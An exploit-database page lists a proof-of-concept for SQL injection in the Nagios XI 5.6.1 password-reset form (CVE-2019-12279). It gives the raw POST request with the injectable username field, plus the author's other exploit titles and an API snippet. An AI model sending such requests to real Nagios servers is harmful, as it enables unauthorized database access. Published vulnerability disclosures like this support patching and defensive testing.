Now you can request a feature, improvement or collaborate with us.
Author
JameelNabbo
Platform
php
Release date
2019-05-23
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | # Exploit Title: Nagiosxi username sql injection # Date: 22/05/2019 # Exploit Author: JameelNabbo # Website: jameelnabbo.com # Vendor Homepage: https://www.nagios.com # Software Link: https://www.nagios.com/products/nagios-xi/ # Version: xi-5.6.1 # Tested on: MacOSX #CVE: CVE-2019-12279 POC: POST /nagiosxi/login.php?forgotpass HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://example.com/nagiosxi/login.php?forgotpass Content-Type: application/x-www-form-urlencoded Content-Length: 129 Connection: close Cookie: nagiosxi=iu78vcultg46f35fq7lfbv8tc6 Upgrade-Insecure-Requests: 1 page=%2Fnagiosxi%2Flogin.php&pageopt=resetpass&nsp=cb6ad70efd0cc0b36ff4fc1d67cd70fb96a7e06622d281acb8810aa65485b03b&username={SQL INJECTION} |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2019-06-04 | "IceWarp 10.4.4 - Local File Inclusion" | webapps | php | JameelNabbo |
2019-05-27 | "Deltek Maconomy 2.2.5 - Local File Inclusion" | webapps | multiple | JameelNabbo |
2019-05-23 | "Nagios XI 5.6.1 - SQL injection" | webapps | php | JameelNabbo |
2019-03-04 | "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" | webapps | hardware | JameelNabbo |
2019-02-15 | "Jinja2 2.10 - 'from_string' Server Side Template Injection" | webapps | python | JameelNabbo |
2018-02-16 | "Twig < 2.4.4 - Server Side Template Injection" | webapps | php | JameelNabbo |
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/46910/?format=json')
For full documentation follow the link above